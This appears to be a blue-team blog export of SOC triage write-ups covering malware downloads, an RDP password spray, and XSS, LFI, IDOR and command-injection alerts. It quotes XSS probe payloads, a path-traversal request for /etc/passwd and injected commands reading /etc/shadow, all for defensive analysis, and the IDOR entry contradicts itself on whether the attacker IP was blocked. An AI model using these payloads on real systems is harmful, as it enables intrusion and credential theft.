The earliest request was /temp/3425.exe at 09:01:40, followed by /kx4.txt at 09:06:50, /bl/client.exe at 09:06:56 and /bl/chooseee.exe at 09:07:17; /kx4.txt was fetched again at 10:10:21, and /bl/client.exe and /sv/fjuivgfhurew.exe followed in the 11:02 window - a staged download sequence in which the early kx4.txt retrieval looks like configuration fetching, although the file analysis below shows kx4.txt is itself an executable despite its extension.\nFile Analysis # To extract file hashes from the downloaded transfers, I queried Zeek file logs - Zeek is a network analysis framework that reconstructs file transfers from packet captures and computes cryptographic hashes:\nindex=* sourcetype=zeek:files tx_hosts=\u0026#34;195.88.191.59\u0026#34;\n| table _time seen_bytes md5 sha1 sha256\nThe query returned 5 unique SHA256 hashes across 6 transfer events, with one file (MD5 564048b35da9d447f2e861d5896d908d) appearing twice at 09:06:50 and 10:10:21 - the same file was downloaded on two separate occasions, matching the two /kx4.txt requests. I submitted all five unique hashes to VirusTotal for static reputation checks.\nfjuivgfhurew.exe (SHA256: 00f15e22ab95632fc51d09f179eb22f5a36e92f6e99390f08a4161f2f93e1717, 91 KB) was flagged by 65/72 vendors as trojan.emotetu/lethic - Emotet is a modular banking trojan and malware loader historically used to deliver secondary payloads.\nmousedriver.exe (SHA256: 2ed4a4ad94c6148b013aecacae783748d51d429de4f1d477a79bbf025d03d47a, 27.5 KB) was flagged by 61/71 vendors as trojan.razy/dugenpal.\nclient.exe (SHA256: 6d8353efda8438bf2dff79d6a4c174d5593450858c74c45c6f2718927546c1bd, 91.5 KB) was flagged by 57/72 vendors as trojan.yakes/barys, with the spreader behavioral tag indicating self-propagation capability.\nkx4.txt (SHA256: 6fbc4d506f4d4e0a64ca09fd826408d3103c1a258c370553583a07a4cb9a6530, 36.5 KB) was flagged by 64/71 vendors as trojan.dacic/vbagent despite its .txt extension - the hosts-modifier, spreader, and calls-wmi behavioral tags confirm this is an executable masquerading as a text file.\nhmm.exe (SHA256: 617520dbb4c29f0d072ffb6f9f637c558dc224441d235943957aaa8f5de8db6f, 225.5 KB) was flagged by 62/72 vendors as 
trojan.zusy/acne with threat categories of trojan, ransomware, and worm - making it the most dangerous payload in the set.\nIOCs # IPs\n- 195.88.191.59 - attacker IP, malware distribution server\n- 147.32.84.165 - victim host\nDomains\n- nocomcom.com - attacker-controlled malware staging domain\nFiles\n- fjuivgfhurew.exe - SHA256: 00f15e22ab95632fc51d09f179eb22f5a36e92f6e99390f08a4161f2f93e1717\n- mousedriver.exe - SHA256: 2ed4a4ad94c6148b013aecacae783748d51d429de4f1d477a79bbf025d03d47a\n- client.exe - SHA256: 6d8353efda8438bf2dff79d6a4c174d5593450858c74c45c6f2718927546c1bd\n- kx4.txt - SHA256: 6fbc4d506f4d4e0a64ca09fd826408d3103c1a258c370553583a07a4cb9a6530\n- hmm.exe - SHA256: 617520dbb4c29f0d072ffb6f9f637c558dc224441d235943957aaa8f5de8db6f\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef c2 fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef mal fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; A([195.88.191.59Attacker]):::c2 --\u003e B[Aug 10 09:01:40 - HTTP GET /temp/3425.exenocomcom.com]:::access B --\u003e C[Aug 10 09:06:50 - HTTP GET /kx4.txtDacic/VBAgent - hosts-modifier, spreader]:::mal C --\u003e D[Aug 10 09:06:56 - HTTP GET /bl/client.exeYakes/Barys trojan - spreader]:::mal D --\u003e E[Aug 10 09:07:17 - HTTP GET /bl/chooseee.exedownload confirmed via Zeek]:::mal E --\u003e F[Aug 10 10:10:21 - HTTP GET /kx4.txtsecond download of same payload]:::mal subgraph LateStage [Late Stage Downloads] F --\u003e G[Aug 10 11:02:11 - HTTP GET /bl/client.exere-download]:::exec G --\u003e H[Aug 10 11:02:21 - HTTP GET 
/sv/fjuivgfhurew.exeEmotet/Lethic trojan]:::exec end subgraph Payloads [Confirmed Malicious Payloads - VirusTotal] H --\u003e I[fjuivgfhurew.exe - Emotet 65/72]:::mal H --\u003e J[mousedriver.exe - Razy 61/71]:::mal H --\u003e K[client.exe - Yakes/Barys 57/72]:::mal H --\u003e L[kx4.txt - Dacic/VBAgent 64/71]:::mal H --\u003e M[hmm.exe - Zusy/Acne ransomware 62/72]:::mal end ","date":"April 7, 2026","externalUrl":null,"permalink":"/blue_team/splunk-nerisbot/","section":"","summary":"A victim host downloaded multiple malicious executables via HTTP, including Emotet, ransomware, and trojan payloads, detected through Suricata IDS alerts and confirmed malicious via VirusTotal.","title":"Splunk-NerisBot","type":"blue_team"},{"content":" TL;DR # An attacker operating from 192.168.1.60 (WorkstationName: kali) conducted a password spraying attack against dev.cyberdefenders.org over RDP. The attack generated 4,302 failed logon attempts (Event ID 4625) over approximately 5 minutes and 48 seconds, targeting multiple usernames via NTLM LogonType 3. Event ID 261 confirmed active RDP-Tcp connection attempts throughout the attack window. Following the brute-force, Event ID 1149 (RDP authentication success) recorded six compromised accounts: squadronwar, interjectaerobics, infestedmerchant, turtledoverecall, harrashusky, and administrator - the last of which was accessed again 11 minutes after the initial compromise.\nInitial Triage # I started the investigation in Splunk by examining the event.code field distribution across all ingested Windows Security and TerminalServices logs to identify the dominant activity type.\nEvent ID 4625 (An account failed to log on) led with 4,312 occurrences at 17.956% of all events - a volume far exceeding normal authentication noise. Also notable was Event ID 261 with 1,983 events (8.258%), which corresponds to Microsoft-Windows-TerminalServices-RemoteConnectionManager logging each inbound RDP-Tcp connection attempt. 
The combination of mass 4625 and high 261 counts immediately pointed to an RDP brute-force or password spraying campaign.\nAttack Source and Scope # I pivoted to identify the source IP behind the 4625 events, grouping by winlog.event_data.IpAddress and winlog.event_data.LogonType.\nThe table confirmed 192.168.1.60 as the sole significant attacker, responsible for 4,302 failed LogonType 3 attempts in August 2022 - LogonType 3 is a network logon, which is what RDP Network Level Authentication (NLA) produces when it validates credentials over NTLM before any interactive session exists; SMB and other network authentication also log type 3, so the RDP attribution rests on the concurrent Event ID 261 records. Two other IPs (192.168.1.51 and 192.168.1.61) each produced 3-5 attempts, consistent with legitimate activity. Expanding one of the 4625 events from 192.168.1.60 confirmed the attack profile.\nThe event showed TargetUserName: administrator, AuthenticationPackageName: NTLM, LogonProcessName: NtLmSsp, WorkstationName: kali, and FailureReason: %%2313 (unknown username or bad password). WorkstationName is supplied by the client during the NTLM exchange, so kali is a string the attacker\u0026rsquo;s tooling chose rather than something the server discovered - a strong, if spoofable, indicator of a Linux attack host running a spraying tool.\nAttack Timeline # To establish the duration of the attack I examined the first and last 4625 events from 192.168.1.60.\nThe first failed logon was recorded at 2022-08-01T16:29:09.460Z and the last at 2022-08-01T16:34:57.623Z - a total attack window of 5 minutes and 48 seconds. 
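The spray-versus-brute-force distinction made in this section (many accounts, few guesses each, inside a short window) is easy to turn into a scoring routine over exported 4625 events. The block below is an added example and not part of the original write-up; the events, the thresholds and the two comparison sources are constructed for illustration, and the field names are the winlog.event_data ones referenced above.

```python
"""Added example (not from the original write-up): classify failed-logon
sources as password spray (T1110.003), brute force (T1110.001) or noise.
Assumed/constructed: the 4625 sample, the thresholds, the field names."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta


def _ev(ts, ip, user, logon_type=3, pkg="NTLM", ws="kali"):
    # Minimal 4625 record with the fields the triage actually keys on
    return {"@timestamp": ts, "IpAddress": ip, "TargetUserName": user,
            "LogonType": logon_type, "AuthenticationPackageName": pkg,
            "WorkstationName": ws, "Status": "0xc000006d"}


# Constructed sample: 192.168.1.60 cycles two guesses across eight accounts in
# ~80 s; 192.168.1.70 hammers one account; 192.168.1.51 is a single typo.
T0 = datetime(2022, 8, 1, 16, 29, 9)
USERS = ["administrator", "squadronwar", "interjectaerobics", "infestedmerchant",
         "turtledoverecall", "harrashusky", "jsmith", "svc_backup"]
SAMPLE_4625 = []
for round_no in range(2):
    for i, u in enumerate(USERS):
        SAMPLE_4625.append(_ev(T0 + timedelta(seconds=round_no * 60 + i * 3), "192.168.1.60", u))
for i in range(30):
    SAMPLE_4625.append(_ev(T0 + timedelta(seconds=i), "192.168.1.70", "administrator", ws="WIN10-PC"))
SAMPLE_4625.append(_ev(T0 + timedelta(minutes=20), "192.168.1.51", "jsmith", ws="JSMITH-PC"))


def summarize_4625(events):
    """Per source IP: attempts, distinct users, attempts per user, span of
    activity, logon types and client-supplied workstation names."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["IpAddress"]].append(e)
    out = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["@timestamp"])
        users = Counter(e["TargetUserName"] for e in evs)
        out[ip] = {
            "attempts": len(evs),
            "distinct_users": len(users),
            "attempts_per_user": len(evs) / len(users),
            "duration": evs[-1]["@timestamp"] - evs[0]["@timestamp"],
            "logon_types": sorted({e["LogonType"] for e in evs}),
            "workstations": sorted({e["WorkstationName"] for e in evs}),
        }
    return out


def classify(summary, min_attempts=10, spray_min_users=5, spray_max_per_user=5):
    """Spray: many users, few attempts each. Brute force: few users, many
    attempts. Anything under min_attempts is treated as ordinary noise."""
    verdicts = {}
    for ip, s in summary.items():
        if s["attempts"] < min_attempts:
            verdicts[ip] = "benign-noise"
        elif s["distinct_users"] >= spray_min_users and s["attempts_per_user"] <= spray_max_per_user:
            verdicts[ip] = "password-spray"
        else:
            verdicts[ip] = "brute-force"
    return verdicts


if __name__ == "__main__":
    summary = summarize_4625(SAMPLE_4625)
    for ip, verdict in classify(summary).items():
        s = summary[ip]
        print(f"{ip:15} {verdict:15} attempts={s['attempts']:3} users={s['distinct_users']:2} "
              f"span={s['duration']} ws={s['workstations']}")
```

The attempts-per-user ratio is the discriminator that separates the two T1110 sub-techniques; thresholds should sit just below the domain lockout policy (a sprayer who knows the policy keeps attempts per account under it on purpose).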
This short, high-volume window across multiple usernames is characteristic of T1110.003 - Password Spraying, where an attacker cycles a small number of passwords across many accounts to avoid lockout thresholds.\nConcurrent with the 4625 flood, an Event ID 261 was generated at 2022-08-01T16:34:57.224Z - roughly 400 ms before the last failed logon - confirming the RDP-Tcp listener on dev.cyberdefenders.org was actively receiving and processing each connection attempt from 192.168.1.60.\nCompromised Accounts # I filtered for Event ID 1149 - logged by Microsoft-Windows-TerminalServices-RemoteConnectionManager when a user successfully authenticates to an RDP session - to identify which accounts the attacker successfully accessed. Event ID 1149 records that the connection passed network-level authentication; it is not by itself proof of an interactive session, so each hit should be corroborated with a Security 4624 LogonType 10 or a TerminalServices-LocalSessionManager 21/22 event for the same account.\nSix accounts authenticated successfully from 192.168.1.60: squadronwar at 16:32:34, interjectaerobics at 16:32:44, infestedmerchant at 16:32:53, turtledoverecall at 16:33:03, harrashusky at 16:33:13, and administrator at 16:34:57. The administrator account was then accessed again at 16:46:10 - 11 minutes after the initial compromise - suggesting the attacker returned for a second interactive RDP session under the highest-privilege account on the host.\nIOCs # IPs\n- 192.168.1.60 - attacker, WorkstationName: kali\nHosts\n- dev.cyberdefenders.org - targeted host\nAccounts\n- administrator - compromised account\n- squadronwar - compromised account\n- interjectaerobics - compromised account\n- infestedmerchant - compromised account\n- turtledoverecall - compromised account\n- harrashusky - compromised account\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef success 
fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef mal fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; A([192.168.1.60 - kali]):::default --\u003e B[2022-08-01 16:29:09 - First 4625Password spray beginsNTLM LogonType 3]:::exec B --\u003e C[16:29 - 16:34 - 4302 failed logonsEvent ID 4625multiple usernames targeted]:::exec C --\u003e D[16:34:57.224 - Event ID 261RDP-Tcp connection receiveddev.cyberdefenders.org]:::access subgraph Spray [Successful Authentications - Event ID 1149] D --\u003e E[16:32:34 - squadronwar]:::success D --\u003e F[16:32:44 - interjectaerobics]:::success D --\u003e G[16:32:53 - infestedmerchant]:::success D --\u003e H[16:33:03 - turtledoverecall]:::success D --\u003e I[16:33:13 - harrashusky]:::success D --\u003e J[16:34:57 - administrator]:::success end J --\u003e K[16:46:10 - administratorsecond RDP session11 minutes later]:::mal ","date":"April 7, 2026","externalUrl":null,"permalink":"/blue_team/splunk-t1110-003/","section":"","summary":"An attacker from 192.168.1.60 (Kali) conducted a 5-minute RDP password spraying attack against dev.cyberdefenders.org, generating 4302 failed logon attempts across multiple usernames, and successfully authenticated as administrator and five other accounts via RDP.","title":"Splunk-T1110-003","type":"blue_team"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/suricata/","section":"Tags","summary":"","title":"Suricata","type":"tags"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/tor/","section":"Tags","summary":"","title":"Tor","type":"tags"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/wmi/","section":"Tags","summary":"","title":"WMI","type":"tags"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/zeek/","section":"Tags","summary":"","title":"Zeek","type":"tags"},{"content":"","date":"April 2, 
2026","externalUrl":null,"permalink":"/tags/broken-access-control/","section":"Tags","summary":"","title":"Broken Access Control","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/command-injection/","section":"Tags","summary":"","title":"Command Injection","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/digitalocean/","section":"Tags","summary":"","title":"DigitalOcean","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/false-positive/","section":"Tags","summary":"","title":"False Positive","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/idor/","section":"Tags","summary":"","title":"IDOR","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/injection/","section":"Tags","summary":"","title":"Injection","type":"tags"},{"content":" Alert # EventID : 116\nEvent Time : Feb, 26, 2022, 06:56 PM\nRule : SOC166 - Javascript Code Detected in Requested URL\nLevel : Security Analyst\nHostname : WebServer1002\nDestination IP Address : 172.16.17.17\nSource IP Address : 112.85.42.13\nHTTP Request Method : GET\nRequested URL : https://172.16.17.17/search/?q=\u0026lt;script\u0026gt;javascript:alert(1)\u0026lt;/script\u0026gt;\nUser-Agent : Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\nAlert Trigger Reason : Javascript code detected in URL\nDevice Action : Allowed\nIdentification # Is the traffic coming from outside? # The source IP 112.85.42.13 is an external address belonging to China Unicom Jiangsu province network (AS4837, Nanjing, China). The destination 172.16.17.17 is an internal address. Traffic direction is Internet to Company Network. This was confirmed not to be a planned test.\nIs the source malicious? # AbuseIPDB shows the IP has been reported 45,324 times with a Confidence of Abuse of 0%. 
The high report volume is notable despite the low confidence score - this is a Fixed Line ISP address rather than a cloud VPS, which is less common for attacker infrastructure but not unusual for compromised residential/business connections used as proxies.\nVirusTotal returned 0/94 detections - no vendor flagged the IP as malicious. However, 1 file was detected communicating with this IP, and the community score is -15, suggesting prior negative community reports.\nWhat type of attack was attempted? # Firewall logs show eight consecutive inbound connections from 112.85.42.13 to 172.16.17.17:443 between 06:34 PM and 06:56 PM, all permitted.\nReviewing the raw log for the triggering request confirmed an XSS payload in the q parameter.\nThe full request history on the /search/ endpoint reveals a systematic XSS probing sequence - the attacker started with a benign q=test request (HTTP 200, 885 bytes) to confirm the endpoint was live, then escalated through multiple injection techniques:\n- q=test - HTTP 200 (baseline probe)\n- q=prompt(8) - HTTP 302\n- q=\u0026lt;img src=q onerror=prompt(8)\u0026gt; - HTTP 302 (img onerror)\n- q=\u0026lt;svg\u0026gt;\u0026lt;script ?\u0026gt;alert(1) - HTTP 302 (SVG vector)\n- q=\u0026lt;script\u0026gt;for((i)in(self))eval(i)(1)\u0026lt;/script\u0026gt; - HTTP 302 (obfuscated eval)\n- q=\u0026lt;script\u0026gt;javascript:alert(1) - HTTP 302 (unclosed tag)\n- q=\u0026lt;script\u0026gt;javascript:alert(1)\u0026lt;/script\u0026gt; - HTTP 302 (final payload)\nThis pattern is consistent with manual or semi-automated XSS fuzzing - testing multiple bypass techniques to find one that evades server-side filtering.\nDid anyone else get targeted? # All connections targeted exclusively 172.16.17.17 on the /search/ endpoint. No other internal hosts were involved.\nDid the attack succeed? # No. Only the initial baseline request (q=test) returned HTTP 200 with a response body of 885 bytes. 
Every subsequent XSS payload returned HTTP 302 with a response size of 0 - the server redirected the request without rendering the payload, consistent with server-side input filtering or a WAF blocking the injection. No successful script execution was observed. One caveat: an empty 302 only proves the payload was not reflected in this response; the Location target was not captured, so the redirected page (and any search-log or error page that echoes q) should be checked before treating the endpoint as safe.\nTriage Decision # True Positive. The attack did not succeed - all XSS payloads were blocked with HTTP 302. No Tier 2 escalation required.\nWhat is the impact level? # Low. The server correctly rejected all injection payloads. However, the attacker successfully fingerprinted the endpoint as live and tested multiple bypass vectors, which may inform follow-up attempts with more advanced payloads.\nContainment # Is the attacker still active? # The last observed request was at 06:56 PM on Feb 26, 2022. No further connections from 112.85.42.13 were observed after the triggering event.\nIs the vulnerable endpoint still exposed? # The /search/ endpoint on 172.16.17.17 remains externally accessible. While the current sanitization blocked these specific payloads, the endpoint should be reviewed for completeness of input validation against advanced bypass techniques.\nActions taken # 112.85.42.13 was blocked at the firewall. The /search/ endpoint was flagged for the application security team to review input validation coverage.\nIOCs # IPs\n- 112.85.42.13 - attacker IP\n- 172.16.17.17 - targeted IP\nURLs\n- hxxps://172.16.17[.]17/search/?q= - targeted endpoint\nUser-Agent\n- Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\nMITRE ATT\u0026amp;CK #\n- Initial Access - Exploit Public-Facing Application - T1190\n- Execution - Command and Scripting Interpreter: JavaScript - T1059.007\n- Discovery - Network Service Discovery - T1046\n","date":"April 2, 2026","externalUrl":null,"permalink":"/blue_team/ld-javascript-code-detected-in-requested-url/","section":"","summary":"An external IP performed XSS reconnaissance against the /search/ endpoint, cycling through multiple injection payloads. 
All requests except the first returned HTTP 302, indicating server-side sanitization blocked execution. The attack did not succeed.","title":"LD-Javascript Code Detected in Requested URL","type":"blue_team"},{"content":" Alert # EventID : 117\nEvent Time : Feb, 27, 2022, 12:36 AM\nRule : SOC167 - LS Command Detected in Requested URL\nLevel : Security Analyst\nHostname : EliotPRD\nDestination IP Address : 188.114.96.15\nSource IP Address : 172.16.17.46\nHTTP Request Method : GET\nRequested URL : https://letsdefend.io/blog/?s=skills\nUser-Agent : Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\nAlert Trigger Reason : URL Contains LS\nDevice Action : Allowed\nIdentification # Is the traffic coming from outside? # The source IP 172.16.17.46 is an internal address. The destination 188.114.96.15 is the address letsdefend.io resolved to - a Cloudflare edge IP fronting a legitimate external platform, so IP reputation lookups on it say nothing about the site itself. Traffic direction is Company Network to Internet.\nIs the source malicious? # The source is an internal host. The destination is a known legitimate platform.\nWhat type of attack was attempted? # No attack was attempted. The alert triggered because the detection rule matched the string ls inside the word skills in the search query ?s=skills. This is a false positive caused by a substring match - the rule lacks context to distinguish the ls Linux command from the same character sequence appearing inside a legitimate word. A rule for shell commands in URLs should URL-decode the parameter value and then match the command only as a whole token, i.e. at the start of the value or after a shell separator such as ;, |, \u0026amp; or a backtick, and followed by whitespace or end of value. The request is a standard blog search on letsdefend.io.\nTriage Decision # False Positive. The URL https://letsdefend.io/blog/?s=skills is a legitimate search request from an internal user to an external platform. The string ls is a substring of skills and does not represent a command injection attempt. No malicious traffic was identified.\nIOCs # None.\n","date":"April 2, 2026","externalUrl":null,"permalink":"/blue_team/ld-ls-command-detected-in-requested-url/","section":"","summary":"Alert triggered on the string ’ls’ found in a legitimate search query parameter. 
The traffic originated from an internal IP to letsdefend.io and contains no malicious payload. False positive - rule lacks context awareness for partial string matches.","title":"LD-LS Command Detected in Requested URL","type":"blue_team"},{"content":" Alert # EventID : 120\nEvent Time : Mar, 01, 2022, 10:10 AM\nRule : SOC170 - Passwd Found in Requested URL - Possible LFI Attack\nLevel : Security Analyst\nHostname : WebServer1006\nDestination IP Address : 172.16.17.13\nSource IP Address : 106.55.45.162\nHTTP Request Method : GET\nRequested URL : https://172.16.17.13/?file=../../../../etc/passwd\nUser-Agent : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)\nAlert Trigger Reason : URL Contains passwd\nDevice Action : Allowed\nIdentification # Is the traffic coming from outside? # The source IP 106.55.45.162 is an external address belonging to Tencent Cloud Computing (Beijing) Co., Ltd. (AS45090, Guangzhou, Guangdong, China). The destination 172.16.17.13 is an internal address. Traffic direction is Internet to Company Network. This was confirmed not to be a planned test.\nIs the source malicious? # AbuseIPDB shows the IP has been reported 3,454 times with a Confidence of Abuse of 0%. The Data Center/Web Hosting usage type and Chinese cloud provider context are consistent with attacker-controlled VPS infrastructure.\nVirusTotal returned 0/94 detections, however the community score is -19 with 57 community comments - a strong negative signal indicating prior malicious activity reported by the community despite no vendor detections.\nWhat type of attack was attempted? # The alert triggered on a GET request to /?file=../../../../etc/passwd - a Local File Inclusion (LFI) attack using path traversal. The file parameter is used to specify a file to include server-side. 
By supplying ../../../../etc/passwd, the attacker attempts to traverse out of the web root and read the system\u0026rsquo;s account file, which contains usernames and can reveal service accounts and system configuration. The outdated User-Agent (MSIE 6.0 / Windows NT 5.1) is a fingerprint commonly seen in automated scanning tools.\nReviewing the raw log confirmed the request details:\nRequest URL: https://172.16.17.13/?file=../../../../etc/passwd\nRequest Method: GET\nDevice Action: Permitted\nHTTP Response Size: 0\nHTTP Response Status: 500\nOnly one connection from 106.55.45.162 was observed in the firewall logs - a single probe rather than a multi-payload enumeration campaign.\nDid anyone else get targeted? # Log review shows only 172.16.17.13 (WebServer1006) was targeted. No other internal hosts were involved.\nDid the attack succeed? # No. The server returned HTTP 500 with a response size of 0 bytes. An HTTP 500 indicates an internal server error - the application failed to process the request and did not return the file contents. A successful LFI would return HTTP 200 with a non-zero response body containing the file data. The attack did not succeed.\nTriage Decision # True Positive. A single LFI probe from an external Tencent Cloud IP was passed by the firewall to the application layer, where it failed with HTTP 500. No Tier 2 escalation required.\nWhat is the impact level? # Low. The attack did not succeed and no data was returned. However, the HTTP 500 response indicates the application attempted to process the file parameter rather than rejecting it at input validation - the endpoint may be vulnerable to LFI with a different traversal depth or encoding.\nContainment # Is the attacker still active? # Only one connection was logged at 10:10 AM on Mar 01, 2022. No follow-up requests were observed.\nIs the vulnerable endpoint still exposed? # The ?file= parameter on 172.16.17.13 remains exposed. 
The HTTP 500 response suggests the parameter reaches the filesystem layer, making it a candidate for further LFI testing with alternate traversal sequences or encoding bypasses. The endpoint should be reviewed by the application security team.\nActions taken # 106.55.45.162 was blocked at the firewall. The ?file= parameter on WebServer1006 was flagged for input validation review.\nIOCs # IPs\n- 106.55.45.162 - attacker IP (Tencent Cloud AS45090, Guangzhou, CN)\nURLs\n- hxxps://172.16.17[.]13/?file=../../../../etc/passwd - LFI payload\nUser-Agent\n- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)\n","date":"April 2, 2026","externalUrl":null,"permalink":"/blue_team/ld-passwd-found-in-requested-url---possible-lfi-attack/","section":"","summary":"An external Tencent Cloud IP sent a single LFI request targeting /etc/passwd via path traversal. The server returned HTTP 500 with an empty response body, confirming the attack did not succeed.","title":"LD-Passwd Found in Requested URL - Possible LFI Attack","type":"blue_team"},{"content":" Alert # EventID : 119\nEvent Time : Feb, 28, 2022, 10:48 PM\nRule : SOC169 - Possible IDOR Attack Detected\nLevel : Security Analyst\nHostname : WebServer1005\nDestination IP Address: 172.16.17.15\nSource IP Address : 134.209.118.137\nHTTP Request Method : POST\nRequested URL : https://172.16.17.15/get_user_info/\nUser-Agent : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)\nAlert Trigger Reason : consecutive requests to the same page\nDevice Action : Allowed\nIdentification # Is the traffic coming from outside? # The source IP 134.209.118.137 is an external address belonging to DigitalOcean LLC (AS14061), located in North Bergen, New Jersey. The destination 172.16.17.15 is an internal address. The traffic is inbound from outside the network.\nIs the source malicious? 
# AbuseIPDB reported the IP 1,536 times with a confidence of abuse of 0%, indicating it is a known DigitalOcean hosting address with no confirmed malicious history.\nVirusTotal returned 0/94 detections — no security vendor flagged the IP as malicious.\nAlthough both sources return clean results, the IP belongs to a cloud hosting provider, which is commonly used to launch attacks anonymously. The repetitive request pattern is the primary indicator here.\nWhat type of attack was attempted? # Firewall logs show five consecutive inbound connections from 134.209.118.137 to 172.16.17.15:443 between 10:45 PM and 10:48 PM, all on different source ports, where each request contained a unique parameter: ?user_id=1, ?user_id=2, ?user_id=3, ?user_id=4, and ?user_id=5.\nRequest URL: https://172.16.17.15/get_user_info/\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)\nRequest Method: POST\nDevice Action: Permitted\nHTTP Response Size: 253\nHTTP Response Status: 200\nPOST Parameters: ?user_id=2\nInsecure Direct Object Reference (IDOR) is an access control vulnerability where an attacker manipulates object references - such as user IDs in a URL or request body - to access data belonging to other users. The endpoint /get_user_info/ is a target for this type of enumeration. The consecutive POST requests from a single external IP suggest the attacker was iterating through user identifiers to extract account data without authorization.\nDid anyone else get targeted? # All connections targeted the same destination - only 172.16.17.15 was affected.\nDid the attack succeed? # I examined the HTTP response data for each of the five requests. All five requests returned HTTP 200 with differing response body sizes. I concluded the attack succeeded and that data for all five queried accounts was exfiltrated.\nTriage Decision # True Positive. An external cloud IP sent repeated automated POST requests to a user data endpoint. 
The firewall allowed all traffic and the endpoint was exposed. The attack pattern is consistent with IDOR enumeration.\nWhat is the impact level? # High. If the /get_user_info/ endpoint does not enforce proper authorization checks, the attacker may have successfully retrieved account data for multiple users. The endpoint handles user information and was accessible without restriction from an external IP.\nContainment # Is the attacker still active? # The last logged connection was at 10:48 PM on Feb 28, 2022. No additional logs were observed after this timestamp. The attacker may have completed the enumeration or moved on, but the IP has not been blocked.\nIs the vulnerable endpoint still exposed? # Yes. The /get_user_info/ endpoint remains accessible from external IPs with no firewall restriction in place.\nActions taken # 134.209.118.137 was blocked at the firewall level. The /get_user_info/ endpoint was flagged for the application security team.\nIOCs # Type | Value | Source\nIP | 134.209.118[.]137 | Firewall logs\nURL | hxxps://172.16.17[.]15/get_user_info/ | Alert\nUser-Agent | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) | Alert\n","date":"April 2, 2026","externalUrl":null,"permalink":"/blue_team/ld-idor/","section":"","summary":"External IP enumerated the /get_user_info/ endpoint via sequential IDOR requests, all returning HTTP 200 - confirming successful data exfiltration across five user accounts.","title":"LD-Possible IDOR Attack Detected","type":"blue_team"},{"content":" Alert # EventID : 118\nEvent Time : Feb, 28, 2022, 04:12 AM\nRule : SOC168 - Whoami Command Detected in Request Body\nLevel : Security Analyst\nHostname : WebServer1004\nDestination IP Address : 172.16.17.16\nSource IP Address : 61.177.172.87\nHTTP Request Method : POST\nRequested URL : https://172.16.17.16/video/\nUser-Agent : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\nAlert Trigger Reason : Request Body Contains whoami string\nDevice Action : Allowed 
Identification # Is the traffic coming from outside? # The source IP 61.177.172.87 falls outside any RFC 1918 private range and resolves to CHINANET Jiangsu Province Network (AS4134, Nanjing, China). Traffic direction is Internet to Company Network. This was confirmed not to be a planned penetration test.\nIs the source malicious? # I checked 61.177.172.87 on AbuseIPDB - the IP has been reported 86,782 times with a Confidence of Abuse of 0%, indicating high historical noise but no active campaign score.\nVirusTotal flagged the IP as malicious by 4/94 vendors. Community score is -1.\nWhat type of attack was attempted? # The attacker exploited a command injection vulnerability on the /video/ endpoint by passing OS commands through the ?c= POST parameter. Command injection occurs when user-supplied input is passed unsanitized to a system shell, allowing arbitrary command execution in the context of the web server process. The attacker ran five commands in sequence - ls, whoami, uname, cat /etc/passwd, and cat /etc/shadow. The use of a spoofed legacy User-Agent (MSIE 6.0 / Windows NT 5.1) indicates deliberate evasion.\nDid anyone else get targeted? # Reviewing the firewall logs, all five requests were directed exclusively at 172.16.17.16:443. No other destination addresses appeared in the log window and no lateral movement was observed.\nDid the attack succeed? # Yes. All five POST requests returned HTTP 200 with varying response sizes ranging from 910 to 1501 bytes, consistent with the server executing each command and returning its output.\nTriage Decision # What is the impact level? # The attacker achieved confirmed remote code execution on 172.16.17.16 (WebServer1004), successfully reading both /etc/passwd and /etc/shadow. Combined with the whoami and uname output, the attacker obtained a full OS fingerprint and the privilege context of the web process. Escalated to Tier 2.\nContainment # Is the attacker still active? 
